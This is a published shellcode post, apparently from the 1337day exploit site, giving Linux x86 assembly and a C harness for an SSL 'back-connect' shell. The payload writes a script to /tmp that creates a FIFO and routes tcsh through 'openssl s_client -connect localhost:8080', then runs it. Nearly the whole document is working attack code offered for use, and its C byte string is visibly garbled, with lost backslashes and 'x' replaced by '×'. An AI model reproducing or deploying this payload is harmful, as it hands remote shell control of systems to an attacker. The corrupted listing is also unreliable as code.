[linux/x86] – linux/x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes
# Title :Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 byte(s)
# Author : TrOoN
# E-mail : www.facebook.com/fysl.fyslm
# Home : city 617 logt Draria algeria
# Web Site : www.1337day.com
# platform :backboX 32 bit Eng
# Type : local root / exploit / shellcode / etc
# download link : backbox.org
#1337day sys : use port 8080 :p
###
#~~~~~~~~# hasbin rohkom khirmana 9a3din gir f 9dime yakhii 3bade pff # ~~~~~~~~#
— —— assmb just begin herE —————————————
** 08048054 <main>:
** 8048054: 31 c0 xor %eax,%eax
** 8048056: 50 push %eax
** 8048057: 6a 65 push $0x65
** 8048059: 68 6b 70 69 70 push $0x7069706b
** 804805e: 68 2f 62 61 63 push $0x6361622f
** 8048063: 68 2f 74 6d 70 push $0x706d742f
** 8048068: 89 e3 mov %esp,%ebx
** 804806a: b0 0a mov $0xa,%al
** 804806c: cd 80 int $0x80
** 804806e: 85 c0 test %eax,%eax
** 8048070: 75 32 jne 80480a4 <del2>
** 8048072: 31 c0 xor %eax,%eax
** 8048074: 31 db xor %ebx,%ebx
** 8048076: 31 d2 xor %edx,%edx
** 8048078: b3 01 mov $0x1,%bl
** 804807a: 31 c0 xor %eax,%eax
** 804807c: 50 push %eax
** 804807d: 6a 6e push $0x6e
** 804807f: 66 68 64 5c pushw $0x5c64
** 8048083: 68 6c 65 74 65 push $0x6574656c
** 8048088: 68 65 20 64 65 push $0x65642065
** 804808d: 68 6b 70 69 70 push $0x7069706b
** 8048092: 68 2f 62 61 63 push $0x6361622f
** 8048097: 68 2f 74 6d 70 push $0x706d742f
** 804809c: 89 e1 mov %esp,%ecx
** 804809e: b2 17 mov $0x17,%dl
** 80480a0: b0 04 mov $0x4,%al
** 80480a2: cd 80 int $0x80
//// Del 2 code ///
** 080480a4 <del2>:
** 80480a4: 31 c0 xor %eax,%eax
** 80480a6: 50 push %eax
** 80480a7: 66 68 73 6c pushw $0x6c73
** 80480ab: 68 2f 63 62 73 push $0x7362632f
** 80480b0: 68 2f 74 6d 70 push $0x706d742f
** 80480b5: 89 e3 mov %esp,%ebx
** 80480b7: b0 0a mov $0xa,%al
** 80480b9: cd 80 int $0x80
** 80480bb: 85 c0 test %eax,%eax
** 80480bd: 75 2a jne 80480e9 <open>
** 80480bf: 31 c0 xor %eax,%eax
** 80480c1: 31 db xor %ebx,%ebx
** 80480c3: 31 d2 xor %edx,%edx
** 80480c5: 50 push %eax
** 80480c6: 68 65 64 5c 6e push $0x6e5c6465
** 80480cb: 68 65 6c 65 74 push $0x74656c65
** 80480d0: 68 73 6c 20 64 push $0x64206c73
** 80480d5: 68 2f 63 62 73 push $0x7362632f
** 80480da: 68 2f 74 6d 70 push $0x706d742f
** 80480df: 89 e1 mov %esp,%ecx
** 80480e1: b3 01 mov $0x1,%bl
** 80480e3: b2 14 mov $0x14,%dl
** 80480e5: b0 04 mov $0x4,%al
** 80480e7: cd 80 int $0x80
** // open code //
** 080480e9 <open>:
** 80480e9: 31 c0 xor %eax,%eax
** 80480eb: 31 c9 xor %ecx,%ecx
** 80480ed: 31 d2 xor %edx,%edx
** 80480ef: 66 b9 41 04 mov $0x441,%cx
** 80480f3: 66 ba a4 01 mov $0x1a4,%dx
** 80480f7: 50 push %eax
** 80480f8: 66 68 73 6c pushw $0x6c73
** 80480fc: 68 2f 63 62 73 push $0x7362632f
** 8048101: 68 2f 74 6d 70 push $0x706d742f
** 8048106: 89 e3 mov %esp,%ebx
** 8048108: b0 05 mov $0x5,%al
** 804810a: cd 80 int $0x80
** 804810c: 89 c6 mov %eax,%esi
**
// write code //
** 0804810e <wtite>:
** 804810e: 31 d2 xor %edx,%edx
** 8048110: 89 f3 mov %esi,%ebx
** 8048112: 31 c0 xor %eax,%eax
** 8048114: 50 push %eax
** 8048115: 66 68 70 65 pushw $0x6570
** 8048119: 68 63 6b 70 69 push $0x69706b63
** 804811e: 68 70 2f 62 61 push $0x61622f70
** 8048123: 68 3e 2f 74 6d push $0x6d742f3e
** 8048128: 68 73 68 20 31 push $0x31206873
** 804812d: 68 6e 2f 74 63 push $0x63742f6e
** 8048132: 68 20 2f 62 69 push $0x69622f20
** 8048137: 68 70 65 20 7c push $0x7c206570
** 804813c: 68 63 6b 70 69 push $0x69706b63
** 8048141: 68 70 2f 62 61 push $0x61622f70
** 8048146: 68 3c 2f 74 6d push $0x6d742f3c
**
** 804814b: 68 38 30 20 30 push $0x30203038
** 8048150: 68 74 3a 38 30 push $0x30383a74
** 8048155: 68 6c 68 6f 73 push $0x736f686c
** 804815a: 68 6c 6f 63 61 push $0x61636f6c
**
** 804815f: 68 65 63 74 20 push $0x20746365
** 8048164: 68 63 6f 6e 6e push $0x6e6e6f63
** 8048169: 68 6e 74 20 2d push $0x2d20746e
** 804816e: 68 63 6c 69 65 push $0x65696c63
** 8048173: 68 6c 20 73 5f push $0x5f73206c
** 8048178: 68 65 6e 73 73 push $0x73736e65
** 804817d: 68 6e 2f 6f 70 push $0x706f2f6e
** 8048182: 68 72 2f 62 69 push $0x69622f72
** 8048187: 68 20 2f 75 73 push $0x73752f20
** 804818c: 68 70 20 26 26 push $0x26262070
** 8048191: 68 69 70 65 20 push $0x20657069
** 8048196: 68 61 63 6b 70 push $0x706b6361
** 804819b: 68 6d 70 2f 62 push $0x622f706d
** 80481a0: 68 64 20 2f 74 push $0x742f2064
** 80481a5: 68 6d 6b 6e 6f push $0x6f6e6b6d
** 80481aa: 89 e1 mov %esp,%ecx
** 80481ac: b2 77 mov $0x77,%dl
** 80481ae: 31 c0 xor %eax,%eax
** 80481b0: b0 04 mov $0x4,%al
** 80481b2: cd 80 int $0x80
**
** 080481b4 <close>:
** 80481b4: 31 c0 xor %eax,%eax
** 80481b6: b0 06 mov $0x6,%al
** 80481b8: 89 f3 mov %esi,%ebx
** 80481ba: cd 80 int $0x80
**
** 080481bc <execve>:
** 80481bc: 31 c0 xor %eax,%eax
** 80481be: 50 push %eax
** 80481bf: 66 68 73 6c pushw $0x6c73
** 80481c3: 68 2f 63 62 73 push $0x7362632f
** 80481c8: 68 2f 74 6d 70 push $0x706d742f
** 80481cd: 89 e3 mov %esp,%ebx
** 80481cf: 50 push %eax
** 80481d0: 66 68 2d 65 pushw $0x652d
** 80481d4: 89 e1 mov %esp,%ecx
** 80481d6: 50 push %eax
** 80481d7: 6a 68 push $0x68
** 80481d9: 66 68 2f 73 pushw $0x732f
** 80481dd: 68 2f 62 69 6e push $0x6e69622f
** 80481e2: 89 e2 mov %esp,%edx
** 80481e4: 50 push %eax
** 80481e5: 53 push %ebx
** 80481e6: 51 push %ecx
** 80481e7: 52 push %edx
** 80481e8: 89 e1 mov %esp,%ecx
** 80481ea: 89 d3 mov %edx,%ebx
** 80481ec: 31 d2 xor %edx,%edx
** 80481ee: b0 0b mov $0xb,%al
** 80481f0: cd 80 int $0x80
**
** 080481f2 <exit>:
** 80481f2: 31 c0 xor %eax,%eax
** 80481f4: b0 01 mov $0x1,%al
** 80481f6: 31 db xor %ebx,%ebx
** 80481f8: cd 80 int $0x80
**
**
*/ // here :p //
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * SC: the assembled payload from the disassembly listing above, written as
 * a C string.
 *
 * NOTE(review): as rendered on this page the declaration is not valid C.
 * It carries a stray word ("char shellcode SC[]"), the hex escapes appear
 * to have lost their backslashes, and many 'x' characters show up as the
 * multiplication sign. The text is kept exactly as published.
 *
 * What the disassembly shows the payload doing, in order (i386 int $0x80
 * system calls):
 *   1. unlink("/tmp/backpipe"), then unlink("/tmp/cbsl"); when a call
 *      returns 0 a "<path> deleted" message is written to fd 1.
 *   2. open("/tmp/cbsl", 0x441, 0x1a4) -- on Linux i386 that is
 *      O_WRONLY|O_CREAT|O_APPEND with mode 0644 -- and write a one-line
 *      shell script into it. The script creates the FIFO /tmp/backpipe
 *      with mknod and runs /usr/bin/openssl s_client -connect
 *      localhost:8080 with its input and output routed through that FIFO
 *      to /bin/tcsh.
 *   3. close() the descriptor, execve("/bin/sh") with argv
 *      { "/bin/sh", "-e", "/tmp/cbsl" } and a NULL envp, then exit(0) if
 *      execve returns.
 *
 * Host artifacts that follow from the above: a regular file /tmp/cbsl, a
 * named pipe /tmp/backpipe, a "/bin/sh -e /tmp/cbsl" process, and an
 * openssl s_client process connecting to TCP port 8080 with a tcsh
 * reading from the pipe.
 */
char shellcode SC[] = "x31xc0×50x6ax65×68x6bx70×69x70×68x2fx62×61x63"
"x68×2fx74×6dx70×89xe3xb0×0axcdx80×85xc0×75x32"
"x31xc0×31xdbx31xd2xb3×01x31xc0×50x6ax6ex66×68"
"x64×5cx68×6cx65×74x65×68x65×20x64×65x68×6bx70"
"x69×70x68×2fx62×61x63×68x2fx74×6dx70×89xe1xb2"
"x17xb0×04xcdx80×31xc0×50x66×68x73×6cx68×2fx63"
"x62×73x68×2fx74×6dx70×89xe3xb0×0axcdx80×85xc0"
"x75×2ax31xc0×31xdbx31xd2×50x68×65x64×5cx6ex68"
"x65×6cx65×74x68×73x6cx20×64x68×2fx63×62x73×68"
"x2fx74×6dx70×89xe1xb3×01xb2×14xb0×04xcdx80×31"
"xc0×31xc9×31xd2×66xb9×41x04×66xbaxa4×01x50×66"
"x68×73x6cx68×2fx63×62x73×68x2fx74×6dx70×89xe3"
"xb0×05xcdx80×89xc6×31xd2×89xf3×31xc0×50x66×68"
"x70×65x68×63x6bx70×69x68×70x2fx62×61x68×3ex2f"
"x74×6dx68×73x68×20x31×68x6ex2fx74×63x68×20x2f"
"x62×69x68×70x65×20x7cx68×63x6bx70×69x68×70x2f"
"x62×61x68×3cx2fx74×6d"
/* next two fragments: the pushes that spell the connect target, localhost:8080 */
"x68×38x30×20x30×68x74×3ax38×30x68×6cx68×6fx73"
"x68×6cx6fx63×61"
/* end of the host:port fragments; the rest of the script text and the
   write/close/execve/exit sequence follow */
"x68×65x63×74x20×68x63×6fx6ex6ex68×6ex74×20x2d"
"x68×63x6cx69×65x68×6cx20×73x5fx68×65x6ex73×73"
"x68×6ex2fx6fx70×68x72×2fx62×69x68×20x2fx75×73"
"x68×70x20×26x26×68x69×70x65×20x68×61x63×6bx70"
"x68×6dx70×2fx62×68x64×20x2fx74×68x6dx6bx6ex6f"
"x89xe1xb2×77x31xc0xb0×04xcdx80×31xc0xb0×06x89"
"xf3xcdx80×31xc0×50x66×68x73×6cx68×2fx63×62x73"
"x68×2fx74×6dx70×89xe3×50x66×68x2dx65×89xe1×50"
"x6ax68×66x68×2fx73×68x2fx62×69x6ex89xe2×50x53"
"x51×52x89xe1×89xd3×31xd2xb0×0bxcdx80×31xc0xb0"
"x01×31xdbxcdx80";
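/*
 * Test harness: print the length of the SC byte string, then transfer
 * control into it.
 *
 * Returns 0 if the call into SC ever comes back.
 */
int main(void)
{
    /*
     * strlen() returns size_t, so the matching conversion is %zu; the
     * published "%dn" had also lost the backslash of its newline.
     * The count stops at the first zero byte in SC.
     */
    fprintf(stdout, "Length: %zu\n", strlen(SC));

    /*
     * Cast the address of the SC array to a function pointer and call it:
     * the bytes of a writable file-scope data array are run as code.
     */
    (*(void(*)()) SC)();

    return 0;
}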
~~~~~~~~~~~~~~~~ 1337 day | ked ans | ALgerian | mosta_team |viper| bRsco_Dz | fire_hacker| hacker_1420 | &all
metasploit | Back track | w3schoOL | AlGerian_ | bem 2012 anchalah khoya | elite_Trojen | security-ray “ ~~~~~~
# [1337day.com][1] [2012-02-12]
[1]: http://www.1337day.com/
